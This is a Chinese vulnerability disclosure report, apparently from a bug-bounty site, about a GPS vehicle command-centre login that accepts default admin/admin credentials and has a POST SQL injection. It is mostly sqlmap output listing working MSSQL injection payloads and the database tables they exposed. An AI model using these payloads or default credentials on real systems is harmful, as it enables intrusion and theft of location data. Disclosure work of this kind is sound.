2015-03-13: 细节已通知厂商并且等待厂商处理中 2015-03-13: 厂商已经确认,细节仅向厂商公开 2015-03-23: 细节向核心白帽子及相关领域专家公开 2015-04-02: 细节向普通白帽子公开 2015-04-12: 细节向实习白帽子公开 2015-04-27: 细节向公众公开
rt
*****挥中心GPS车^*****1.http://**.**.**/login.htm
admin/admin登录框还存在post注入
*****60862211c4c36f0e.jpg" al********************804f21d1370528e1.jpg" al*****
sqlmap identified the following injection points with a total of 310 HTTP(s) requests:---Parameter: userid (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: userid=asd' AND 4457=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4457=4457) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113))) AND 'rBNt'='rBNt&password=asd&I1.x=14&I1.y=14 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userid=asd';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: userid=asd' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14 Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: userid=asd' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(103)+CHAR(83)+CHAR(69)+CHAR(71)+CHAR(121)+CHAR(121)+CHAR(119)+CHAR(65)+CHAR(75)+CHAR(109)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=asd&I1.x=14&I1.y=14---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: userid (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: userid=asd' AND 4457=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4457=4457) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113))) AND 'rBNt'='rBNt&password=asd&I1.x=14&I1.y=14 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userid=asd';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: userid=asd' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14 Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: userid=asd' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(103)+CHAR(83)+CHAR(69)+CHAR(71)+CHAR(121)+CHAR(121)+CHAR(119)+CHAR(65)+CHAR(75)+CHAR(109)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=asd&I1.x=14&I1.y=14---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000Database: tempdb[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: msdb[83 tables]+--------------------------------------------+| RTblClassDefs || RTblClassExtension || RTblDBMProps || RTblDBXProps || RTblDTMProps || RTblDTSProps || RTblDatabaseVersion || RTblEQMProps || RTblEnumerationDef || RTblEnumerationValueDef || RTblGENProps || RTblIfaceDefs || RTblIfaceHier || RTblIfaceMem || RTblMDSProps || RTblNamedObj || RTblOLPProps || RTblParameterDef || RTblPropDefs || RTblProps || RTblRelColDefs || RTblRelshipDefs || RTblRelshipProps || RTblRelships || RTblSIMProps || RTblScriptDefs || RTblSites || RTblSumInfo || RTblTFMProps || RTblTypeInfo || RTblTypeLibs || RTblUMLProps || RTblUMXProps || RTblVersionAdminInfo || RTblVersions || RTblWorkspaceItems || backupfile || backupmediafamily || backupmediaset || backupset || log_shipping_databases || log_shipping_monitor || log_shipping_plan_databases || log_shipping_plan_history || log_shipping_plans || log_shipping_primaries || log_shipping_secondaries || logmarkhistory || mswebtasks || restorefilegroup || restorefilegroup || restorehistory || sqlagent_info || sysalerts || syscachedcredentials || syscategories || sysconstraints || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagelog || sysdtspackages || sysdtssteplog || sysdtstasklog || sysjobhistory || sysjobs_view || sysjobs_view || sysjobschedules || sysjobservers || sysjobsteps || sysnotifications || sysoperators || syssegments || systargetservergroupmembers || systargetservergroups || systargetservers_view || systargetservers_view || systaskids || systasks_view || systasks_view |+--------------------------------------------+Database: pubs[14 tables]+--------------------------------------------+| authors || discounts || employee || jobs || pub_info || publishers || roysched || sales || stores || sysconstraints || syssegments || titleauthor || titles || titleview |+--------------------------------------------+Database: gpslog[116 tables]+--------------------------------------------+| ALARMMSG201005 || ALARMMSG201010 || ALARMMSG201011 || ALARMMSG201012 || ALARMMSG201101 || ALARMMSG201102 || ALARMMSG201103 || ALARMMSG201104 || ALARMMSG201105 || ALARMMSG201106 || ALARMMSG201107 || ALARMMSG201108 || ALARMMSG201109 || ALARMMSG201110 || ALARMMSG201111 || ALARMMSG201112 || ALARMMSG201201 || ALARMMSG201202 || ALARMMSG201203 || ALARMMSG201204 || ALARMMSG201205 || ALARMMSG201206 || ALARMMSG201207 || ALARMMSG201208 || ALARMMSG201209 || ALARMMSG201210 || ALARMMSG201211 || ALARMMSG201212 || ALARMMSG201301 || ALARMMSG201302 || ALARMMSG201303 || ALARMMSG201304 || ALARMMSG201305 || ALARMMSG201306 || ALARMMSG201307 || ALARMMSG201308 || ALARMMSG201309 || ALARMMSG201310 || ALARMMSG201311 || ALARMMSG201312 || ALARMMSG201401 || ALARMMSG201402 || ALARMMSG201403 || ALARMMSG201404 || ALARMMSG201405 || ALARMMSG201406 || ALARMMSG201407 || ALARMMSG201408 || ALARMMSG201409 || ALARMMSG201410 || ALARMMSG201411 || ALARMMSG201412 || ALARMMSG201501 || ALARMMSG201502 || ALARMMSG201503 || ALARMMSG201504 || HISTORYINFO201005 || HISTORYINFO201010 || HISTORYINFO201011 || HISTORYINFO201012 || HISTORYINFO201101 || HISTORYINFO201102 || HISTORYINFO201103 || HISTORYINFO201104 || HISTORYINFO201105 || HISTORYINFO201106 || HISTORYINFO201107 || HISTORYINFO201108 || HISTORYINFO201109 || HISTORYINFO201110 || HISTORYINFO201111 || HISTORYINFO201112 || HISTORYINFO201201 || HISTORYINFO201202 || HISTORYINFO201203 || HISTORYINFO201204 || HISTORYINFO201205 || HISTORYINFO201206 || HISTORYINFO201207 || HISTORYINFO201208 || HISTORYINFO201209 || HISTORYINFO201210 || HISTORYINFO201211 || HISTORYINFO201212 || HISTORYINFO201301 || HISTORYINFO201302 || HISTORYINFO201303 || HISTORYINFO201304 || HISTORYINFO201305 || HISTORYINFO201306 || HISTORYINFO201307 || HISTORYINFO201308 || HISTORYINFO201309 || HISTORYINFO201310 || HISTORYINFO201311 || HISTORYINFO201312 || HISTORYINFO201401 || HISTORYINFO201402 || HISTORYINFO201403 || HISTORYINFO201404 || HISTORYINFO201405 || HISTORYINFO201406 || HISTORYINFO201407 || HISTORYINFO201408 || HISTORYINFO201409 || HISTORYINFO201410 || HISTORYINFO201411 || HISTORYINFO201412 || HISTORYINFO201501 || HISTORYINFO201502 || HISTORYINFO201503 || HISTORYINFO201504 || dtproperties || mt_info || sysconstraints || syssegments |+--------------------------------------------+Database: master[36 tables]+--------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || MSreplication_options || spt_datatype_info_ext || spt_datatype_info_ext || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_provider_types || spt_server_info || spt_values || sysconstraints || syslogins || sysoledbusers || sysopentapes || sysremotelogins || syssegments |+--------------------------------------------+Database: model[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: Northwind[31 tables]+--------------------------------------------+| Categories || CustomerCustomerDemo || CustomerDemographics || Customers || EmployeeTerritories || Employees || Invoices || Region || Shippers || Suppliers || Territories || Alphabetical list of products || Category Sales for 1997 || Current Product List || Customer and Suppliers by City || Order Details Extended || Order Details Extended || Order Subtotals || Orders Qry || Orders Qry || Product Sales for 1997 || Products Above Average Price || Products Above Average Price || Products by Category || Quarterly Orders || Sales Totals by Amount || Sales by Category || Summary of Sales by Quarter || Summary of Sales by Year || sysconstraints || syssegments |+--------------------------------------------+
修改密码,过滤相关字符
危害等级:高
漏洞Rank:11
确认时间:2015-03-13 15:25
验证确认存在所描述的问题,已通知其修改。
暂无
